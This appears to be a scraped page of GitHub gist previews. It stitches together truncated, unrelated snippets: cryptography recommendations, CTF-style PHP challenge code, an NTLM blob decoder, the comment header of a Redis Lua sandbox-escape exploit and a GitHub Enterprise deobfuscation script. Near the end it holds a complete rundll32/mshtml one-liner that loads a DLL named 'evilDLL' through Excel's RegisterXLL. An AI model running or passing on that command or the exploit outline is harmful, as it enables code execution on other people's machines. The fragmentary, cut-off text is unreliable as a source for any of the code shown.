Nicolas Grekas - nicolas.grekas, gmail.com
17 June 2011 - Last updated on 3 sept. 2011
Not updated any more on this gist. See:
#!/usr/bin/env python | |
#coding=utf-8 | |
import web, settings | |
urls = ( | |
'/uploads/(.*)', 'download', | |
'([a-z0-9\/]*)', 'dispatcher' | |
) | |
class dispatcher: |
**Encrypting data** (*Was: AES-CTR with HMAC*): Use, in order of preference: (1) The Nacl/libsodium default, (2) Chacha20-Poly1305, or (3) AES-GCM. | |
*You care about this if: you're hiding information from users or the network.* | |
All three options get you "AEAD", which is the only way you want to encrypt in 2015. Options (2) and (3) are morally the same thing: a stream cipher with a polynomial ("thermonuclear CRC") MAC. Option (2) gets there with a native stream cipher and a MAC optimized for general purpose CPUs; Poly1305 is also easier than GCM for library designers to implement safely. Option (3)'s AES-GCM is the industry standard; it's fast and usually hardware accelerated on modern processors, but has implementation safety pitfalls on platforms that aren't accelerated. | |
*Avoid: AES-CBC, AES-CTR by itself, block ciphers with 64-bit blocks --- most especially Blowfish, which is inexplicably popular, OFB mode. Don't ever use RC4, which is comically broken.* | |
**Symmetric key length** (*Was: Use 256 bit keys* |
<?php | |
include "config.php"; | |
mysql_connect($dbhost, $dbuser, $dbpass); | |
mysql_select_db($dbname); | |
function escape($str){ | |
$str = strtolower($str); | |
$str = str_replace("'", "", $str); | |
$str = str_replace("\\", "", $str); |
<?php | |
/* | |
sqlpwn by orange | |
Don't brute force or you will be banned ! | |
*/ | |
session_start(); | |
error_reporting(0); | |
include "template.html"; |
<?php | |
highlight_file(__FILE__); | |
$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR']; | |
if ( !file_exists($dir) ) | |
mkdir($dir); | |
chdir($dir); | |
$args = $_GET['args']; | |
for ( $i=0; $i<count($args); $i++ ){ |
Nicolas Grekas - nicolas.grekas, gmail.com
17 June 2011 - Last updated on 3 sept. 2011
Not updated any more on this gist. See:
#!/usr/bin/env python | |
## Decodes NTLM "Authenticate" HTTP-Header blobs. | |
## Reads the raw blob from stdin; prints out the contained metadata. | |
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages. | |
## Based on the excellent protocol description from: | |
## <http://davenport.sourceforge.net/ntlm.html> | |
## with additional detail subsequently added from the official protocol spec: | |
## <http://msdn.microsoft.com/en-us/library/cc236621.aspx> | |
## |
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit | |
## Original exploit by corsix and sghctoma | |
## Author: @c3c | |
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode | |
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486 | |
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different | |
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf | |
## This code is much the same, except the process is done using pwntools' DynELF | |
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version |
REM rundll32 mshtml.dll HTA one-liner command: | |
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); |
#!/usr/bin/sudo sh | |
## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+. | |
## From `strings ruby_concealer.so`: | |
## | |
## > This obfuscation is intended to discourage GitHub Enterprise customers | |
## > from making modifications to the VM. | |
## | |
## Well, good, as long as its not intended to discourage *me* from doing this! |